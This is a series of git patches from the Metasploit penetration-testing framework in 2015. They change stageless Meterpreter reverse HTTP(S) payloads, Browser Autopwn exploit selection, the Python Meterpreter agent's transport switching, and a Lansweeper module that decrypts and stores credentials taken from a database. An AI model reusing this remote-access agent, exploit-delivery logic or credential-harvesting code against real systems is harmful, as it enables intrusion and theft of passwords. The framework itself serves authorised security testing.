--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -48,7 +48,8 @@ module Msf::Payload::TransportConfig
     # going up as part of the stage.
     uri = opts[:uri]
     unless uri
-      sum = uri_checksum_lookup(:connect)
+      type = opts[:stageless] == true ? :init_connect : :connect
+      sum = uri_checksum_lookup(type)
       uri = generate_uri_uuid(sum, opts[:uuid])
     end
 
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
index 78561d56b4..de0b7c4e10 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -45,6 +45,7 @@ module Metasploit4
 
   def generate_config(opts={})
     opts[:uuid] ||= generate_payload_uuid
+    opts[:stageless] = true
 
     # create the configuration block
     config_opts = {
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
index 195a176b98..690604981a 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -45,6 +45,7 @@ module Metasploit4
 
   def generate_config(opts={})
     opts[:uuid] ||= generate_payload_uuid
+    opts[:stageless] = true
 
     # create the configuration block
     config_opts = {
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
index e978b16c97..b84ce4f7fb 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -45,6 +45,7 @@ module Metasploit4
 
   def generate_config(opts={})
     opts[:uuid] ||= generate_payload_uuid
+    opts[:stageless] = true
 
     # create the configuration block
     config_opts = {
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
index 45f9d53014..a8b2260db6 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -45,6 +45,7 @@ module Metasploit4
 
   def generate_config(opts={})
     opts[:uuid] ||= generate_payload_uuid
+    opts[:stageless] = true
 
     # create the configuration block
     config_opts = {

From bb43f7e30f5e77e694a982e99148f4628e21d83b Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Sat, 27 Jun 2015 10:50:54 -0500
Subject: [PATCH 0586/1013] use the correct transport for
 x64/meterpreter_reverse_https

---
 .../payloads/singles/windows/x64/meterpreter_reverse_https.rb   | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
index a8b2260db6..fe0e6c1977 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -53,7 +53,7 @@ module Metasploit4
       exitfunk:   datastore['EXITFUNC'],
       expiration: datastore['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
-      transports: [transport_config_reverse_http(opts)],
+      transports: [transport_config_reverse_https(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(',')
     }
 

From 88e58cbdc591411fc4d03b9f5ddc0d2aa0e30083 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 27 Jun 2015 12:19:07 -0500
Subject: [PATCH 0587/1013] Better performance

---
 lib/msf/core/exploit/browser_autopwnv2.rb     | 57 ++++++++++---------
 .../core/exploit/browser_autopwnv2_spec.rb    |  6 +-
 2 files changed, 33 insertions(+), 30 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index c428af2cbb..7da6a2d385 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -176,6 +176,7 @@ module Msf
 
     # Checks if a resource is already taken or not.
     #
+    # @param resource [String] The resource to check.
     # @return [TrueClass] Resource is taken.
     # @return [FalseClass] Resource is not taken.
     def is_resource_taken?(resource)
@@ -227,7 +228,7 @@ module Msf
 
     # Sorts a grouped module list by disclosure date.
     #
-    # @param [Hash] bap_groups A grouped module list.
+    # @param bap_groups [Hash] A grouped module list.
     # @return [Hash] A hash with each module list sorted by disclosure date.
     def sort_date_in_group(bap_groups)
       bap_groups.each_pair do |ranking, module_list|
@@ -238,7 +239,7 @@ module Msf
 
     # Sorts a module list by ranking.
     #
-    # @param [Hash] bap_groups A grouped module list.
+    # @param bap_groups [Hash] A grouped module list.
     # @return [Hash] A hash grouped by ranking.
     def sort_group_by_rank(bap_groups)
       Hash[bap_groups.sort_by {|k,v| k}.reverse]
@@ -265,7 +266,7 @@ module Msf
     # Modifies @bap_exploit by replacing it with the rearranged module list.
     #
     # @see #bap_exploits The read-only attribute.
-    # @param [Hash] bap_groups A grouped module list.
+    # @param bap_groups [Hash] A grouped module list.
     # @return [void]
     def finalize_sorted_modules(bap_groups)
       @bap_exploits = []
@@ -281,7 +282,7 @@ module Msf
     # Returns a payload name. Either this will be the user's choice, or falls back to a default one.
     #
     # @see DEFAULT_PAYLOADS The default settings.
-    # @param [Symbol] platform Platform name.
+    # @param platform [Symbol] Platform name.
     # @return [String] Payload name.
     def get_selected_payload_name(platform)
       payload_name = datastore["PAYLOAD_#{platform.to_s.upcase}"]
@@ -300,7 +301,7 @@ module Msf
 
     # Returns the selected payload's LPORT.
     #
-    # @param [Symbol] platform
+    # @param platform [Symbol]
     # @return [Fixnum]
     def get_selected_payload_lport(platform)
       datastore["PAYLOAD_#{platform.to_s.upcase}_LPORT"]
@@ -367,7 +368,7 @@ module Msf
 
     # Returns the human-readable version of the rank.
     #
-    # @param [Fixnum] rank
+    # @param rank [Fixnum]
     # @return [String]
     def parse_rank(rank)
       RankingName[rank].to_s.capitalize
@@ -377,8 +378,8 @@ module Msf
     # Checks whether the payload is compatible with the module based on platform information.
     # Best for single-platform modules and for performance.
     #
-    # @param [Object] m Module.
-    # @param [Symbol] payload_platform Payload platform.
+    # @param m [Object] Module.
+    # @param payload_platform [Symbol] Payload platform.
     # @return [TrueClass] Payload is compatible.
     # @return [FalseClass] Payload is not compatible.
     def is_payload_platform_compatible?(m, payload_platform)
@@ -394,20 +395,14 @@ module Msf
     end
 
 
-    # Checks whether the payload is compatible with the module based on the module's compatibility list.
-    # Best for multi-platform modules. This is much slower than #is_payload_platform_compatible?
+    # Checks whether the payload is compatible with the module based on the module's compatibility list
     #
-    # @note This method is really slow, and it's really noticeable with Flash exploits because they're
-    #  multi-platform. In our testing, every Flash that ends up using this code takes about 0.4 second
-    #  to initialize when on average each BES should only take 0.1 to load. Evetnaully this will get
-    #  worse. Luke is in the process of improving module searching (by caching), and that should make
-    #  this problem go away. If not, we'll have to avoid using compatible_payloads and do our own thing.
-    # @param [Object] m Module.
-    # @param [String] payload_name
+    # @param compatible_payloads [Array] A list of payloads that are compatible
+    # @param payload_name [String]
     # @return [TrueClass] Payload is compatible.
     # @return [FalseClass] Payload is not compatible.
-    def is_payload_compatible?(m, payload_name)
-      m.compatible_payloads.each do |k|
+    def is_payload_compatible?(compatible_payloads, payload_name)
+      compatible_payloads.each do |k|
         return true if k[0] == payload_name
       end
 
@@ -417,9 +412,9 @@ module Msf
 
     # Checks if the module is multi-platform based on the directory path.
     #
-    # @param [Object] m Module.
-    # @return [TrueClass] Module is multi-platform.
-    # @return [FalseClass] Module is not multi-platform.
+    # @param m [Object] Module.
+    # @return Module [TrueClass] is multi-platform.
+    # @return Module [FalseClass] is not multi-platform.
     def is_multi_platform_exploit?(m)
       m.fullname.include?('multi/')
     end
@@ -427,11 +422,13 @@ module Msf
 
     # Returns an appropriate payload that's compatible with the module.
     #
-    # @param [Object] m A module that's been initialized.
+    # @param m [Object] A module that's been initialized.
     # @return [Array] Payload name. Example: 'windows/meterpreter/reverse_tcp'
     def select_payload(m)
       compatible_payloads = []
 
+      module_payloads = nil
+
       DEFAULT_PAYLOADS.each_pair do |platform, info|
         payload_choice = {
           :payload_name => get_selected_payload_name(platform),
@@ -441,8 +438,14 @@ module Msf
         if !is_multi_platform_exploit?(m) && !m.platform.platforms.empty? && is_payload_platform_compatible?(m, platform)
           compatible_payloads << payload_choice
           break
-        elsif is_payload_compatible?(m, payload_choice[:payload_name])
-          compatible_payloads << payload_choice
+        else
+          # The #compatible_payloads method is super expensive (slow). By doing it this way,
+          # I managed to shave off seconds.
+          module_payloads ||= m.compatible_payloads
+
+          if is_payload_compatible?(module_payloads, payload_choice[:payload_name])
+            compatible_payloads << payload_choice
+          end
         end
       end
 
@@ -628,8 +631,8 @@ module Msf
 
     # Logs a click that includes the suitable exploit list.
     #
-    # @param [String] ip The target's IP address.
-    # @param [String] data (Optional) CSV data that contains the exploit list.
+    # @param ip [String] The target's IP address.
+    # @param data [String] (Optional) CSV data that contains the exploit list.
     # @return [void]
     def log_click(ip, data='')
       report_note(
diff --git a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
index 1d003816f6..eef314059e 100644
--- a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
+++ b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
@@ -629,17 +629,17 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
   end
 
   describe '#is_payload_compatible?' do
-    let(:windows_exploit) { create_fake_ms14_064 }
+    let(:windows_exploit_payloads) { create_fake_ms14_064.compatible_payloads }
 
     context 'when a valid payload name is given' do
       it 'returns true' do
-        expect(subject.is_payload_compatible?(windows_exploit, windows_meterpreter_reverse_tcp)).to be_truthy
+        expect(subject.is_payload_compatible?(windows_exploit_payloads, windows_meterpreter_reverse_tcp)).to be_truthy
       end
     end
 
     context 'when an invalid payload name is given' do
       it 'returns false' do
-        expect(subject.is_payload_compatible?(windows_exploit, linux_meterpreter_reverse_tcp)).to be_falsey
+        expect(subject.is_payload_compatible?(windows_exploit_payloads, linux_meterpreter_reverse_tcp)).to be_falsey
       end
     end
   end

From 5c039ccfd796637c96d563fdb3a421a5a99b73e0 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 27 Jun 2015 13:51:21 -0500
Subject: [PATCH 0588/1013] Even faster

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 7da6a2d385..885b86c782 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -63,7 +63,6 @@ module Msf
           next
         end
         if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer)
-          set_exploit_options(mod)
           @bap_exploits << mod
         end
       end
@@ -460,6 +459,7 @@ module Msf
     # @return [void]
     def start_exploits
       bap_exploits.each do |m|
+        set_exploit_options(m)
         m.exploit_simple(
           'LocalInput'  => self.user_input,
           'LocalOutput' => self.user_output,

From 6136269aceed91839d221629d37a77267340190e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 27 Jun 2015 13:53:29 -0500
Subject: [PATCH 0589/1013] No can't do this

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 885b86c782..7da6a2d385 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -63,6 +63,7 @@ module Msf
           next
         end
         if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer)
+          set_exploit_options(mod)
           @bap_exploits << mod
         end
       end
@@ -459,7 +460,6 @@ module Msf
     # @return [void]
     def start_exploits
       bap_exploits.each do |m|
-        set_exploit_options(m)
         m.exploit_simple(
           'LocalInput'  => self.user_input,
           'LocalOutput' => self.user_output,

From b332b257951d95cedf625ab1dbf39a87511ba5c4 Mon Sep 17 00:00:00 2001
From: cldrn <calderon@websec.mx>
Date: Sat, 27 Jun 2015 19:06:15 -0500
Subject: [PATCH 0590/1013] Stores credentials in DB, fixes loop variable and
 nil dereference bug

---
 .../auxiliary/gather/lansweeper_collector.rb    | 17 ++++++++++++++---
 1 file changed, 14 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/gather/lansweeper_collector.rb b/modules/auxiliary/gather/lansweeper_collector.rb
index f04ee87330..8b73e67f0b 100644
--- a/modules/auxiliary/gather/lansweeper_collector.rb
+++ b/modules/auxiliary/gather/lansweeper_collector.rb
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
     num2 = uint32(v[0])
     num3 = uint32(v[1])
 
-    for i in 0..0x1f
+    0.upto(0x1f) do
       num3 -= uint32((uint32(num2 << 4) ^ uint32(num2 >> 5)) + num2) ^
               uint32(num + k[uint32(num >> 11) & 3])
       num3 = uint32(num3)
@@ -104,10 +104,21 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
+    unless mssql_login_datastore
+      fail_with(Failure::NoAccess, "Login failed. Check credentials.")
+    end
     result = mssql_query('select Credname, Username, Password from ' + datastore['DATABASE'] +
-    '.dbo.tsysCredentials WHERE LEN(Password)>64', false) if mssql_login_datastore
+    '.dbo.tsysCredentials WHERE LEN(Password)>64', false)
     result[:rows].each do |row|
-      print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{lswdecrypt(row[2])} ")
+      pw = lswdecrypt(row[2])
+      print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{pw}")
+      report_auth_info(
+        :host => rhost,
+        :port => rport,
+        :sname => row[0],
+        :user => row[1],
+        :pass => pw
+      )
     end
     disconnect
   end

From f6fa462bdc377e5e61709c2aa6347e246fe5add0 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Sat, 27 Jun 2015 20:57:45 -0400
Subject: [PATCH 0591/1013] Pymet support for changing transports

---
 data/meterpreter/meterpreter.py | 56 +++++++++++++++++++++++++++------
 1 file changed, 47 insertions(+), 9 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index c24cdf211e..55aa88974d 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -77,6 +77,9 @@ PACKET_TYPE_RESPONSE       = 1
 PACKET_TYPE_PLAIN_REQUEST  = 10
 PACKET_TYPE_PLAIN_RESPONSE = 11
 
+STAGE_END_MARKER = bytes('### meterpreter stage end ###\n')
+STAGE_START_MARKER = bytes('#!/usr/b')
+
 ERROR_SUCCESS = 0
 # not defined in original C implementation
 ERROR_FAILURE = 1
@@ -418,6 +421,12 @@ class Transport(object):
 		transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT)
 		return transport
 
+	def activate(self):
+		return
+
+	def deactivate(self):
+		return
+
 	def get_packet(self):
 		self.communication_active = False
 		try:
@@ -476,6 +485,8 @@ class HttpTransport(Transport):
 		url_h = urllib.urlopen(request)
 		packet = url_h.read()
 		if packet:
+			if packet[8:] == STAGE_START_MARKER:
+				return _get_packet()
 			packet = packet[8:]
 		else:
 			packet = None
@@ -500,15 +511,15 @@ class TcpTransport(Transport):
 		self.url = url
 		self.socket = socket
 
-	def _check_socket(self):
+	def activate(self):
 		if self.socket:
 			return
 		if self.url.startswith('tcp:'):
 			family = socket.AF_INET
-			address, port = url[6:].split(':', 1)
+			address, port = self.url[6:].split(':', 1)
 		else:
 			family = socket.AF_INET6
-			address, port = url[7:].split(':', 1)
+			address, port = self.url[7:].split(':', 1)
 		port = int(port.rstrip('/'))
 		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 		if address == '0.0.0.0' or address == '::':
@@ -520,13 +531,24 @@ class TcpTransport(Transport):
 		self.socket = sock
 		return
 
+	def deactivate(self):
+		if not self.socket:
+			return
+		self.socket.shutdown(socket.SHUT_RDWR)
+		self.socket.close()
+		self.socket = None
+
 	def _get_packet(self):
-		self._check_socket()
 		packet = None
 		if len(select.select([self.socket], [], [], 0.5)[0]):
 			packet = self.socket.recv(8)
 			if len(packet) != 8:
 				return None
+			if packet == STAGE_START_MARKER:
+				while self.socket.recv(len(STAGE_END_MARKER), socket.MSG_PEEK) != STAGE_END_MARKER:
+					self.socket.recv(1)
+				self.socket.recv(len(STAGE_END_MARKER))
+				return self._get_packet()
 			pkt_length, pkt_type = struct.unpack('>II', packet)
 			pkt_length -= 8
 			packet = bytes()
@@ -535,7 +557,6 @@ class TcpTransport(Transport):
 		return packet
 
 	def _send_packet(self, packet):
-		self._check_socket()
 		self.socket.send(packet)
 
 	@classmethod
@@ -555,6 +576,7 @@ class TcpTransport(Transport):
 class PythonMeterpreter(object):
 	def __init__(self, transport):
 		self.transport = transport
+		self.transport.activate()
 		self.running = False
 		self.last_registered_extension = None
 		self.extension_functions = {}
@@ -610,6 +632,19 @@ class PythonMeterpreter(object):
 	def session_has_expired(self):
 		return time.time() > self.session_expiry_end
 
+	def change_transport(self, forward=True):
+		current_idx = self.transports.index(self.transport)
+		if forward:
+			new_idx = min(current_idx + 1, len(self.transports) - 1)
+		else:
+			new_idx = max(current_idx - 1, 0)
+		if new_idx == current_idx:
+			return
+		self.transport.deactivate()
+		self.transport = self.transports[new_idx]
+		self.transport.activate()
+
+
 	def run(self):
 		while self.running and not self.session_has_expired:
 			request = None
@@ -756,10 +791,12 @@ class PythonMeterpreter(object):
 		return ERROR_SUCCESS, response
 
 	def _core_transport_next(self, request, response):
-		raise NotImplemented()
+		self.change_transport(forward=True)
+		return ERROR_SUCCESS, response
 
 	def _core_transport_prev(self, request, response):
-		raise NotImplemented()
+		self.change_transport(forward=False)
+		return ERROR_SUCCESS, response
 
 	def _core_transport_set_timeouts(self, request, response):
 		timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
@@ -909,8 +946,7 @@ class PythonMeterpreter(object):
 		resp = struct.pack('>I', len(resp) + 4) + resp
 		return resp
 
-#if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
-if True:
+if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
 	if hasattr(os, 'setsid'):
 		try:
 			os.setsid()
@@ -922,3 +958,5 @@ if True:
 		transport = TcpTransport.from_socket(s)
 	met = PythonMeterpreter(transport)
 	met.run()
+
+### meterpreter stage end ###

From 1d50bda609f0e022744a3736758484b70eec0d68 Mon Sep 17 00:00:00 2001
From: h00die <mike@shorebreaksecurity.com>
Date: Sat, 27 Jun 2015 21:38:25 -0400
Subject: [PATCH 0592/1013] initial add of blank file

---
 modules/exploits/multi/http/werkzeug_debug_rce.rb | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 modules/exploits/multi/http/werkzeug_debug_rce.rb

diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb
new file mode 100644
index 0000000000..e69de29bb2

From 7742d85f2fc088ad156f4bf2cc6a49024f4dc37e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 27 Jun 2015 20:58:19 -0500
Subject: [PATCH 0593/1013] I guess that's fine

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 7da6a2d385..d2b3ccbf92 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -63,7 +63,7 @@ module Msf
           next
         end
         if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer)
-          set_exploit_options(mod)
+          
           @bap_exploits << mod
         end
       end
@@ -460,6 +460,7 @@ module Msf
     # @return [void]
     def start_exploits
       bap_exploits.each do |m|
+        set_exploit_options(m)
         m.exploit_simple(
           'LocalInput'  => self.user_input,
           'LocalOutput' => self.user_output,

From 5c18fc82f26a269a648b19c34afef677f9e26b23 Mon Sep 17 00:00:00 2001
From: cldrn <calderon@websec.mx>
Date: Sun, 28 Jun 2015 09:24:31 -0500
Subject: [PATCH 0594/1013] Stores credentials using create_credential_login

---
 .../auxiliary/gather/lansweeper_collector.rb  | 26 ++++++++++++++++---
 1 file changed, 23 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/gather/lansweeper_collector.rb b/modules/auxiliary/gather/lansweeper_collector.rb
index 8b73e67f0b..d42eb6fa79 100644
--- a/modules/auxiliary/gather/lansweeper_collector.rb
+++ b/modules/auxiliary/gather/lansweeper_collector.rb
@@ -103,6 +103,26 @@ class Metasploit3 < Msf::Auxiliary
     Rex::Text.to_ascii(decrypted, 'utf-16le')
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:host],
+      port: opts[:port],
+      service_name: opts[:creds_name],
+    }
+    credential_data = {
+      username: opts[:user]
+      private_type: :password,
+      private_data: opts[:password],
+      module_fullname: self.fullname
+    }.merge(service_data)
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run
     unless mssql_login_datastore
       fail_with(Failure::NoAccess, "Login failed. Check credentials.")
@@ -112,12 +132,12 @@ class Metasploit3 < Msf::Auxiliary
     result[:rows].each do |row|
       pw = lswdecrypt(row[2])
       print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{pw}")
-      report_auth_info(
+      report_cred(
         :host => rhost,
         :port => rport,
-        :sname => row[0],
+        :creds_name => row[0],
         :user => row[1],
-        :pass => pw
+        :password => pw
       )
     end
     disconnect

From 355738909aa7bc6b0e6d8a179a9694c46272bdb8 Mon Sep 17 00:00:00 2001
From: cldrn <calderon@websec.mx>
Date: Sun, 28 Jun 2015 09:32:16 -0500
Subject: [PATCH 0595/1013] Fixes typo

---
 modules/auxiliary/gather/lansweeper_collector.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/gather/lansweeper_collector.rb b/modules/auxiliary/gather/lansweeper_collector.rb
index d42eb6fa79..551b9e4af3 100644
--- a/modules/auxiliary/gather/lansweeper_collector.rb
+++ b/modules/auxiliary/gather/lansweeper_collector.rb
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
       service_name: opts[:creds_name],
     }
     credential_data = {
-      username: opts[:user]
+      username: opts[:user],
       private_type: :password,
       private_data: opts[:password],
       module_fullname: self.fullname

From 00742ea924651e8cbdad83f2d7ecca0fc09055af Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Sun, 28 Jun 2015 13:16:00 -0400
Subject: [PATCH 0596/1013] Pymet cleaner transport switching with responses

---
 data/meterpreter/meterpreter.py | 25 +++++++++++++++++--------
 1 file changed, 17 insertions(+), 8 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index 55aa88974d..d62344edbc 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -312,6 +312,12 @@ def tlv_pack(*args):
 			data = struct.pack('>II', 8 + len(value), tlv['type']) + value
 	return data
 
+@export
+def tlv_pack_response(result, response):
+	response += tlv_pack(TLV_TYPE_RESULT, result)
+	response = struct.pack('>I', len(response) + 4) + response
+	return response
+
 #@export
 class MeterpreterFile(object):
 	def __init__(self, file_obj):
@@ -644,7 +650,6 @@ class PythonMeterpreter(object):
 		self.transport = self.transports[new_idx]
 		self.transport.activate()
 
-
 	def run(self):
 		while self.running and not self.session_has_expired:
 			request = None
@@ -653,7 +658,8 @@ class PythonMeterpreter(object):
 				request = self.get_packet()
 			if request:
 				response = self.create_response(request)
-				self.send_packet(response)
+				if response:
+					self.send_packet(response)
 			else:
 				# iterate over the keys because self.channels could be modified if one is closed
 				channel_ids = list(self.channels.keys())
@@ -791,12 +797,14 @@ class PythonMeterpreter(object):
 		return ERROR_SUCCESS, response
 
 	def _core_transport_next(self, request, response):
+		self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
 		self.change_transport(forward=True)
-		return ERROR_SUCCESS, response
+		return None
 
 	def _core_transport_prev(self, request, response):
+		self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
 		self.change_transport(forward=False)
-		return ERROR_SUCCESS, response
+		return None
 
 	def _core_transport_set_timeouts(self, request, response):
 		timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
@@ -933,7 +941,10 @@ class PythonMeterpreter(object):
 			handler = self.extension_functions[handler_name]
 			try:
 				self.debug_print('[*] running method ' + handler_name)
-				result, resp = handler(request, resp)
+				result = handler(request, resp)
+				if result is None:
+					return
+				result, resp = result
 			except Exception:
 				self.debug_print('[-] method ' + handler_name + ' resulted in an error')
 				if DEBUGGING:
@@ -942,9 +953,7 @@ class PythonMeterpreter(object):
 		else:
 			self.debug_print('[-] method ' + handler_name + ' was requested but does not exist')
 			result = error_result(NotImplementedError)
-		resp += tlv_pack(TLV_TYPE_RESULT, result)
-		resp = struct.pack('>I', len(resp) + 4) + resp
-		return resp
+		return tlv_pack_response(result, resp)
 
 if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
 	if hasattr(os, 'setsid'):

From afa442ad89301dfda08ec8f86a51eef23da1c485 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Mon, 29 Jun 2015 00:46:35 -0500
Subject: [PATCH 0597/1013] Fix a stack trace with ipmi_dumphashes when no
 database was configured.

---
 modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
index 93e95ac91b..9d64d504af 100644
--- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
@@ -270,7 +270,7 @@ class Metasploit3 < Msf::Auxiliary
     }.merge(service_data)
 
     cl = create_credential_login(login_data)
-    cl.core_id
+    cl ? cl.core_id : nil
   end
 
   def report_cracked_cred(user, password, core_id)

From 2cbb107bbac945227ecaa2f4ce04ad671ba06124 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 29 Jun 2015 09:55:18 -0500
Subject: [PATCH 0598/1013] Update enum_configs

---
 modules/post/linux/gather/enum_configs.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/linux/gather/enum_configs.rb b/modules/post/linux/gather/enum_configs.rb
index 9d1c29a66b..8e6ca7cf9d 100644
--- a/modules/post/linux/gather/enum_configs.rb
+++ b/modules/post/linux/gather/enum_configs.rb
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Post
     when /meterpreter/
       host = sysinfo["Computer"]
     when /shell/
-      host = session.shell_command_token("hostname").chomp
+      host = cmd_exec("hostname").chomp
     end
 
     return host

From ae172691f2809f78a60939b6b9cc43e9462d6d8a Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 29 Jun 2015 10:21:13 -0500
Subject: [PATCH 0599/1013] Update linux gather post modules

---
 modules/post/linux/gather/enum_network.rb     |  2 +-
 modules/post/linux/gather/enum_protections.rb |  2 +-
 modules/post/linux/gather/enum_system.rb      | 19 -------------------
 .../post/linux/gather/enum_users_history.rb   | 11 -----------
 4 files changed, 2 insertions(+), 32 deletions(-)

diff --git a/modules/post/linux/gather/enum_network.rb b/modules/post/linux/gather/enum_network.rb
index 32b8f923d0..ba52141294 100644
--- a/modules/post/linux/gather/enum_network.rb
+++ b/modules/post/linux/gather/enum_network.rb
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Post
     when /meterpreter/
       host = sysinfo["Computer"]
     when /shell/
-      host = session.shell_command_token("hostname").chomp
+      host = cmd_exec("hostname").chomp
     end
 
     print_status("Running module against #{host}")
diff --git a/modules/post/linux/gather/enum_protections.rb b/modules/post/linux/gather/enum_protections.rb
index cc96a9acc6..ab18a0c403 100644
--- a/modules/post/linux/gather/enum_protections.rb
+++ b/modules/post/linux/gather/enum_protections.rb
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Post
     when /meterpreter/
       host = sysinfo["Computer"]
     when /shell/
-      host = session.shell_command_token("hostname").chomp
+      host = cmd_exec("hostname").chomp
     end
 
     return host
diff --git a/modules/post/linux/gather/enum_system.rb b/modules/post/linux/gather/enum_system.rb
index fb2f225378..e96331fa98 100644
--- a/modules/post/linux/gather/enum_system.rb
+++ b/modules/post/linux/gather/enum_system.rb
@@ -79,31 +79,12 @@ class Metasploit3 < Msf::Post
     print_status("#{msg} stored in #{loot}")
   end
 
-  def get_host
-    case session.type
-    when /meterpreter/
-      host = sysinfo["Computer"]
-    when /shell/
-      host = session.shell_command_token("hostname").chomp
-    end
-
-    print_status("Running module against #{host}")
-
-    host
-  end
-
   def execute(cmd)
     vprint_status("Execute: #{cmd}")
     output = cmd_exec(cmd)
